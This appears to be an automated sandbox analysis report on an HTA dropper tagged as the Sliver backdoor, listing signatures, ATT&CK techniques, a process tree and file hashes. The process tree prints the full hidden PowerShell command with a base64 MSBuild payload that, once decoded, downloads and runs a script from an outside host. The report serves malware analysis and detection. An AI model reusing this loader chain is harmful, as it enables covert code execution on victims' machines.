sliver | 3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3

Analysis

max time kernel
118s
max time network
148s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07-11-2024 02:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta
Size

3KB
MD5

f46e78d3864aae68f2b8e83af27b9cf3
SHA1

51d75c93a4d06327f172d41c797ecc99a8ba309a
SHA256

3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3
SHA512

e714e39827ebe83e3c5e31bbd780d2909318a1bfaf2017476ee137b87ddf417ef0d0f933844c3140c2f276601658ad81e51718eb01286641504cdc0fb9d9662c

Score

10^/10

sliver backdoor defense_evasion discovery execution trojan

Malware Config

Signatures

Sliver RAT v2 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2692-76-0x0000000020720000-0x000000002119B000-memory.dmp	SliverRAT_v2
behavioral1/memory/2692-77-0x0000000022120000-0x0000000022C04000-memory.dmp	SliverRAT_v2
behavioral1/memory/2692-78-0x0000000022120000-0x0000000022C04000-memory.dmp	SliverRAT_v2
behavioral1/memory/2692-80-0x0000000022120000-0x0000000022C04000-memory.dmp	SliverRAT_v2
behavioral1/memory/2692-79-0x0000000022120000-0x0000000022C04000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
2768	powershell.exe

Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

Processes:

certutil.exe

pid	Process
2572	certutil.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

mshta.exepowershell.execertutil.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid	Process
2768	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exemsbuild.exe

description	pid	Process
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	2692	msbuild.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

mshta.exepowershell.exemsbuild.execsc.execsc.execsc.exe

description	pid	Process	procid_target
PID 2748 wrote to memory of 2768	2748	mshta.exe	30
PID 2748 wrote to memory of 2768	2748	mshta.exe	30
PID 2748 wrote to memory of 2768	2748	mshta.exe	30
PID 2748 wrote to memory of 2768	2748	mshta.exe	30
PID 2768 wrote to memory of 2572	2768	powershell.exe	32
PID 2768 wrote to memory of 2572	2768	powershell.exe	32
PID 2768 wrote to memory of 2572	2768	powershell.exe	32
PID 2768 wrote to memory of 2572	2768	powershell.exe	32
PID 2768 wrote to memory of 2692	2768	powershell.exe	33
PID 2768 wrote to memory of 2692	2768	powershell.exe	33
PID 2768 wrote to memory of 2692	2768	powershell.exe	33
PID 2768 wrote to memory of 2692	2768	powershell.exe	33
PID 2692 wrote to memory of 2872	2692	msbuild.exe	34
PID 2692 wrote to memory of 2872	2692	msbuild.exe	34
PID 2692 wrote to memory of 2872	2692	msbuild.exe	34
PID 2872 wrote to memory of 1272	2872	csc.exe	35
PID 2872 wrote to memory of 1272	2872	csc.exe	35
PID 2872 wrote to memory of 1272	2872	csc.exe	35
PID 2692 wrote to memory of 1736	2692	msbuild.exe	36
PID 2692 wrote to memory of 1736	2692	msbuild.exe	36
PID 2692 wrote to memory of 1736	2692	msbuild.exe	36
PID 1736 wrote to memory of 2936	1736	csc.exe	37
PID 1736 wrote to memory of 2936	1736	csc.exe	37
PID 1736 wrote to memory of 2936	1736	csc.exe	37
PID 2692 wrote to memory of 2944	2692	msbuild.exe	38
PID 2692 wrote to memory of 2944	2692	msbuild.exe	38
PID 2692 wrote to memory of 2944	2692	msbuild.exe	38
PID 2944 wrote to memory of 2968	2944	csc.exe	39
PID 2944 wrote to memory of 2968	2944	csc.exe	39
PID 2944 wrote to memory of 2968	2944	csc.exe	39

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2748
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPg0KICA8IS0tIFRoaXMgaW5saW5lIHRhc2sgZXhlY3V0ZXMgYyMgY29kZS4gLS0+DQogIDwhLS0gQzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29yazY0XHY0LjAuMzAzMTlcbXNidWlsZC5leGUgcHNoZWxsLnhtbCAtLT4NCiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4NCiAgPCEtLSBMaWNlbnNlOiBCU0QgMy1DbGF1c2UgLS0+DQogIDxUYXJnZXQgTmFtZT0iSGVsbG8iPg0KICAgPEZyYWdtZW50RXhhbXBsZSAvPg0KICAgPENsYXNzRXhhbXBsZSAvPg0KICA8L1RhcmdldD4NCiAgPFVzaW5nVGFzaw0KICAgIFRhc2tOYW1lPSJGcmFnbWVudEV4YW1wbGUiDQogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSINCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4NCiAgICA8UGFyYW1ldGVyR3JvdXAvPg0KICAgIDxUYXNrPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtLklPIiAvPg0KICAgICAgPENvZGUgVHlwZT0iRnJhZ21lbnQiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICAgICAgICAgIENvbnNvbGUuV3JpdGVMaW5lKCJIZWxsbyBGcm9tIEZyYWdtZW50Iik7DQogICAgICAgIF1dPg0KICAgICAgPC9Db2RlPg0KICAgIDwvVGFzaz4NCiAgICA8L1VzaW5nVGFzaz4NCiAgICA8VXNpbmdUYXNrDQogICAgVGFza05hbWU9IkNsYXNzRXhhbXBsZSINCiAgICBUYXNrRmFjdG9yeT0iQ29kZVRhc2tGYWN0b3J5Ig0KICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPg0KICAgIDxUYXNrPg0KICAgICAgPFJlZmVyZW5jZSBJbmNsdWRlPSJTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uIiAvPg0KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICANCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbTsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOw0KICAgICAgICAgICAgLy9BZGQgRm9yIFBvd2VyU2hlbGwgSW52b2NhdGlvbg0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlRleHQ7DQogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOw0KICAgICAgICAgICAgdXNpbmcgTWljcm9zb2Z0LkJ1aWxkLlV0aWxpdGllczsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIHB1YmxpYyBjbGFzcyBDbGFzc0V4YW1wbGUgOiAgVGFzaywgSVRhc2sNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIFN0cmluZyBjbWQgPSBAIihOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vc2VjdXJlLmNsb3VkdGVjaG5vbG9naWVzdXNhLmNvbTo4MDgxL3VwZGF0ZS50eHQnKSB8IGlleCI7DQogICAgICAgICAgICBSdW5zcGFjZSBycyA9IFJ1bnNwYWNlRmFjdG9yeS5DcmVhdGVSdW5zcGFjZSgpOw0KICAgICAgICAgICAgcnMuT3BlbigpOw0KICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7DQogICAgICAgICAgICBwcy5SdW5zcGFjZSA9IHJzOw0KICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7DQogICAgICAgICAgICBwcy5JbnZva2UoKTsNCiAgICAgICAgICAgIHJzLkNsb3NlKCk7DQogICAgICAgICAgICByZXR1cm4gdHJ1ZTsNCiAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgDQogICAgICAgICAgICANCiANCiAgICAgICAgICAgIA0KICAgICAgICBdXT4NCiAgICAgIDwvQ29kZT4NCiAgICA8L1Rhc2s+DQogIDwvVXNpbmdUYXNrPg0KPC9Qcm9qZWN0Pg== > c:\windows\temp\enc3.txt;certutil -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\windows\temp\d.xml
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Windows\SysWOW64\certutil.exe
    "C:\Windows\system32\certutil.exe" -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml
    3⤵
    - Deobfuscate/Decode Files or Information
    - System Location Discovery: System Language Discovery
    PID:2572
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe" C:\windows\temp\d.xml
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3y1bivfx\3y1bivfx.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2872
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA27.tmp" "c:\Users\Admin\AppData\Local\Temp\3y1bivfx\CSCC73DE90DF3FE46598A3F4938CE41537B.TMP"
        5⤵
        
        PID:1272
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3chag5h1\3chag5h1.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1736
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAE2.tmp" "c:\Users\Admin\AppData\Local\Temp\3chag5h1\CSC473A7D4465454302B63FC1A2A078FC3.TMP"
        5⤵
        
        PID:2936
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g1dxskcg\g1dxskcg.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2944
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2E.tmp" "c:\Users\Admin\AppData\Local\Temp\g1dxskcg\CSC3DDB26D312934F398C30737F68A1486.TMP"
        5⤵
        
        PID:2968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3chag5h1\3chag5h1.dll

Filesize
4KB

MD5
f141f55ec69dc14196a7af09d7e301ac

SHA1
c7e24dc33f39d117d7f1b9adb178ec8ddd050b63

SHA256
73ddda7e24b98c7bd2af45a0697e84dad5ffc43c24050b325160184840bf6b39

SHA512
39a80c757b29537ee761c249b5b9849cc424442288e82f8d7ca15d7259ce83bd9ec87ca1e20845512d1fac6818988cc7aa2dcc39ba5f0c9ee82e37dfa23fb3ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\3chag5h1\3chag5h1.pdb

Filesize
11KB

MD5
800e7d0afceab1832b10cdbc8d766b8c

SHA1
d966032b2f0f443bc1a907acc6be69d8170e2529

SHA256
925a5a5d3dd699b7752d6d7ca999ccb15ab18677a9633c15074969155286c619

SHA512
7ebdd4084a78562996dacb44e7291c1b7a5802ab039d4add67cf297fddfcd00152135fe5f661775d9f95d961c404fbc7c6584c76642f454095c7493a00840a9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\3y1bivfx\3y1bivfx.dll

Filesize
4KB

MD5
871310a72720c7438be53ea245772876

SHA1
5bc1d5ac372d82a59b0a89f421a450e37bb2119e

SHA256
c9c401c7315a530d53850ea41dc54a22e0c1405dec710bb19ed8f176001e8b83

SHA512
2fcc749ae3c402f18746c872cdb917addbc748d5bd9afc64b35cf81ba160c68c44db01a0cdd3a087dfc9adb5b572fc69722a99eac8150f1596d726170cea08bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\3y1bivfx\3y1bivfx.pdb

Filesize
11KB

MD5
c7936299b9bfc29ce8394ce0b53691f8

SHA1
d9f9865049ec7ddc3ddda32aa994bb531f47b793

SHA256
a975ad2b4f961ce2d4cf9f815f9eec24c676cf97e60206aa825df191d7af3736

SHA512
bb9cff07cbb1d9c3d27babf5450b061d80a5d8d0e5e1087a7a5b66f8d5b6f8801890787cee5594af64059df627b246943d9cdb640caa1c0cd8a33378a82ad7eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA2E.tmp

Filesize
1KB

MD5
8146d6167d5d0e653f2af2c19b7d8153

SHA1
0ce33ea0f723f8d8ee8d8cf2ff1a2329b1d4764d

SHA256
c5ce212180e04d9f7543067387401ce45f394ae52a2962a16ab91c381fe844a3

SHA512
8924b1ecf200b6c4e6d4b353936b15f889c59d83364384a0a9872e8ef2c00a3e0cd73b5507249553bed04ff4f0468eb7b64a4addddaef997a020df24b93ab768

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESFA27.tmp

Filesize
1KB

MD5
6057a3f2ca92de0ab2306decbc05ad9f

SHA1
ff4979644347518b3cf7ec9889ba20c811a51c74

SHA256
fb44bd10da2fd69a8e3de2ea1721f03c47b2d4c2be3c8f90ca227367cb4eb767

SHA512
3071e52dae57d724004ad34c4720f472bef7d72ec9211dd761ac3846a88c683106a7f1f3b3948d8a7b58c7b31bc0f7d46d1ba1cc35a70ac335e10a9f424bd812

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESFAE2.tmp

Filesize
1KB

MD5
b3c0b5b8e367c2edc292dcd6e1ad5575

SHA1
42834fe78ff4a2ffb460d086c61de1315ff38eb1

SHA256
8669cc2a08b180c0568cb767e2401d75c9cd28e4bc00ba594a3971cdfae1e380

SHA512
2819c249f79e304ae0935e9c3f8f51e81056827e15a74a94ed6b1f2ba215584f401421d12d2b3e91adda2b289115aa25a2d8b849f6bb9f3b2b09595f562c6daa

Download Submit
C:\Users\Admin\AppData\Local\Temp\g1dxskcg\g1dxskcg.dll

Filesize
4KB

MD5
2d4becbdf913f86a0b8b727c5efa6cd2

SHA1
656615a8165a445be69a271e8880debd4d68b3dd

SHA256
6ae336202037340b3510db3a520ba4afdda4e9cc8498cc916ce151457fbe535b

SHA512
1912992df9f3b41525cfdc8b80d9fa6213166ba1cc16036a7be53acac4bca217bae1f4a9750251276f03ad2e4a082e1fbd9de012410c3bb88b1f85b209bf0eaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\g1dxskcg\g1dxskcg.pdb

Filesize
7KB

MD5
c892f0ab44e3c63bed25aa8c1d518235

SHA1
778a74d58617189b9321f844e686a619f6f17a8c

SHA256
8f379d8196ab67bc7d50cf3ee0409fd38e3757e9d0b83142843dd3d5b9d91347

SHA512
e8934b7d5b39fb136f0e4e43d8c2e459580bd3d1208c1f5b24c95da0b309b63592ab8d1f86131a60f924e917c5eacf2e7916ce622c7c5907f580aa962d069611

Download Submit
C:\windows\temp\d.xml

Filesize
2KB

MD5
6c2a8d820d8d80182aacdc125399cd71

SHA1
51ccd1e0c3247bf24da813a1f660a367f8deefc8

SHA256
104291eb54874a1e80375b91ec552efac6632272654c8a5613730bd2eba9e78a

SHA512
c7c825a9b237850f6d087a449baaeed4e671db91b3db078586e322e992cb26efdb24d0ff8b365291ff58c3786dc563a62c4cbdcb81cecd95027606ef6fffd8c3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3chag5h1\3chag5h1.0.cs

Filesize
1KB

MD5
da1f4b7b1a87cc475dfa05923b6301a0

SHA1
0e2ff764c519bc8169b66437857f01e25676e343

SHA256
624fe16b05ade5d9929c6ecf16857939230ea32156405c18b4dacfb0448e310e

SHA512
d09603fd0e641122cc99ccf6c53bb93db7df2b52ed1cdd44d3e73d963a3e9fd12eb1918477c043ba39e2ae123071f2df98b9180eb2a533c01bbdbaab2563b53b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3chag5h1\3chag5h1.cmdline

Filesize
782B

MD5
02d3f7f7044b4a1514c7761850fc3e36

SHA1
457a196c89f08e1a5cea4e4e21c1ffd1eed94301

SHA256
4837ffe0f77c00dfc6ebcce8ac96526c83c6330f325a4ba998ae2e3d63d04bf4

SHA512
196b47f2dac332088c2f9f01384187a7b9b619da79e1838a4b5e61218c914bc1dbb970acb676d21cf413f4285c400917428cba7f9815bb162796edf8660509c8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3chag5h1\CSC473A7D4465454302B63FC1A2A078FC3.TMP

Filesize
652B

MD5
1eb6a26487a14eab9ee8af9701a46c0f

SHA1
14c15c01139f83d4e536128438ef9850ee46e571

SHA256
54e79833a1daadfdd1fc07d31f1c20f4d2b94eec12fc4fa98f4010cb6a2bc133

SHA512
5fd337519a92525a89eba88e67fa5bf9f6d82035c6615f67c613d715768d03f2b4c22756e93caebeb5abd73b4ed2aac75762a1ceb7dfac6d2d642915a3b7c2f0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3y1bivfx\3y1bivfx.0.cs

Filesize
1KB

MD5
4a4ff4a5e71cabe4864c862a697c1e27

SHA1
b95fb7438213c3ae9caf0e8b52bb301fefcddb56

SHA256
70e3eb02311312b3f1ff90617cb47ebb9b8e7cab47771668811a34584182c6bb

SHA512
7c9257e5f23e2c378f47cb3bdced440d07bf96575a10883e59e0a0b4d8834b0ab3a43e4b850f48e2538021d2b352d732fc93f81277bcc20c45b070dc56bdcff5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3y1bivfx\3y1bivfx.cmdline

Filesize
660B

MD5
598a2ad886ab485f646be09d6c03d299

SHA1
646e22650f6ec739dfa426c5fe4dd50653d40224

SHA256
1787820228785d0d09d7957ef85d778a1c45c9726f15d7e2cda56d7839d6feb3

SHA512
748105aa393c2fab7c2527d2ab45f6bba81b780b763411690fc807a9108184d4917879e1f29fef0eef9cecf1579ce865405bc9abc9d98a779e68299f2bedb304

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3y1bivfx\CSCC73DE90DF3FE46598A3F4938CE41537B.TMP

Filesize
652B

MD5
ea7f15b0cdb1719f37d3a28fd7517a38

SHA1
be3031cd65f650490d6fd1121f458e9ef58f9562

SHA256
bec78056e7ae5b2302e239413f4caa67df3b35283f1ab8ef281b277711b139aa

SHA512
e154ea5592ac4f426bfff3efe6e0f05c64ee6222b8dd7e595c8865b44bfbd5dd26a9683723d08e623f56d4440c5f1b641f833c25ba2477f3e11dffabcbfb04a1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\g1dxskcg\CSC3DDB26D312934F398C30737F68A1486.TMP

Filesize
652B

MD5
68769b273edb517eacf49d9d80ebc82f

SHA1
96fc7c33e6c7cf3cd1b9d43c70ebf8c7ed5a8bdc

SHA256
cd7c756209e436658d93c5f634667f3ce741c2c3353210f37dadf4c2c8376882

SHA512
9ff7ff7c5159b194d511d69ad0728e06706c7855eef8cb952062ca37e541dd902030329def3c6bce385ab08b41b5cffbe94c8b36fc08375417071bfdb2d07d9d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\g1dxskcg\g1dxskcg.0.cs

Filesize
611B

MD5
9dc0e32c32d7b3cfd2f819d8c0e4c7a5

SHA1
267cb8f96e02e298033786efd8ee6d87a73418a3

SHA256
67bc3e11493360528ba1296980ab818bf4c3938d14ddd6b5063bba03667b28ac

SHA512
c41e6c862933bed65c892b6cc89765a63ae936bdcb7a0499e0b1bd57d2a1d710dd66acb58fa7a7ffbef8a339fe647ccae85f6fdac3e7e7657472576a979a14b0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\g1dxskcg\g1dxskcg.cmdline

Filesize
327B

MD5
49bc501d29b390765419864216b3c7df

SHA1
274946ab93f73c2cf9bbf38fe27f1db270a8f592

SHA256
bd75a1738591f665506848423febbf7c0bd3d95bba2fe0eced60cd0aa502cfd3

SHA512
35c2dba913c61c7199c1da59567b2bec94175727975b45a937b9952bb1888037ac70f677cebd0e8b3819639b69a658df713c4672ae7db8068eac9f5435c8ab8b

Download Submit
\??\c:\windows\temp\enc3.txt

Filesize
6KB

MD5
940ed0fa0b1fc8ed6fbf279ab67af56f

SHA1
da4b7c40029542659f025ae74fa0be0fb0fa473c

SHA256
731673720695df22b838e0d256f7506eaa4c7570601db0a409302ab3a0cd1686

SHA512
934e3c5ee3b225ab0d686310a435865880b6c59f4885bb93cca814e8354456de3231364d3aa5cb6bc3c4472e6e6539da719c2b214e998e9e5773cca02f7d14ae

Download Submit
memory/2692-12-0x00000000023C0000-0x0000000002404000-memory.dmp

Filesize
272KB

Download
memory/2692-57-0x000000001C1F0000-0x000000001C312000-memory.dmp

Filesize
1.1MB

Download
memory/2692-13-0x00000000023C0000-0x00000000023DA000-memory.dmp

Filesize
104KB

Download
memory/2692-33-0x000000001DFA0000-0x000000001E282000-memory.dmp

Filesize
2.9MB

Download
memory/2692-11-0x00000000022E0000-0x0000000002324000-memory.dmp

Filesize
272KB

Download
memory/2692-10-0x000000001D030000-0x000000001D152000-memory.dmp

Filesize
1.1MB

Download
memory/2692-9-0x000000001C1F0000-0x000000001C312000-memory.dmp

Filesize
1.1MB

Download
memory/2692-48-0x00000000023C0000-0x00000000023C8000-memory.dmp

Filesize
32KB

Download
memory/2692-50-0x00000000023D0000-0x00000000023EC000-memory.dmp

Filesize
112KB

Download
memory/2692-51-0x00000000023F0000-0x0000000002438000-memory.dmp

Filesize
288KB

Download
memory/2692-52-0x000000001B290000-0x000000001B298000-memory.dmp

Filesize
32KB

Download
memory/2692-53-0x000000001BC30000-0x000000001BCD6000-memory.dmp

Filesize
664KB

Download
memory/2692-54-0x000000001B2A0000-0x000000001B2D4000-memory.dmp

Filesize
208KB

Download
memory/2692-55-0x000000001BCE0000-0x000000001BD2A000-memory.dmp

Filesize
296KB

Download
memory/2692-56-0x000000001BD70000-0x000000001BD86000-memory.dmp

Filesize
88KB

Download
memory/2692-14-0x000000001C1F0000-0x000000001C36A000-memory.dmp

Filesize
1.5MB

Download
memory/2692-58-0x000000001C1F0000-0x000000001C312000-memory.dmp

Filesize
1.1MB

Download
memory/2692-59-0x000000001E490000-0x000000001E54A000-memory.dmp

Filesize
744KB

Download
memory/2692-32-0x000000001C1F0000-0x000000001C312000-memory.dmp

Filesize
1.1MB

Download
memory/2692-30-0x0000000002330000-0x0000000002338000-memory.dmp

Filesize
32KB

Download
memory/2692-15-0x000000001D160000-0x000000001D4C4000-memory.dmp

Filesize
3.4MB

Download
memory/2692-7-0x000000001B7F0000-0x000000001B94A000-memory.dmp

Filesize
1.4MB

Download
memory/2692-74-0x000000001B2E0000-0x000000001B2E8000-memory.dmp

Filesize
32KB

Download
memory/2692-6-0x0000000000540000-0x000000000055A000-memory.dmp

Filesize
104KB

Download
memory/2692-5-0x000000013FE30000-0x000000013FE6E000-memory.dmp

Filesize
248KB

Download
memory/2692-76-0x0000000020720000-0x000000002119B000-memory.dmp

Filesize
10.5MB

Download
memory/2692-77-0x0000000022120000-0x0000000022C04000-memory.dmp

Filesize
10.9MB

Download
memory/2692-78-0x0000000022120000-0x0000000022C04000-memory.dmp

Filesize
10.9MB

Download
memory/2692-80-0x0000000022120000-0x0000000022C04000-memory.dmp

Filesize
10.9MB

Download
memory/2692-79-0x0000000022120000-0x0000000022C04000-memory.dmp

Filesize
10.9MB

Download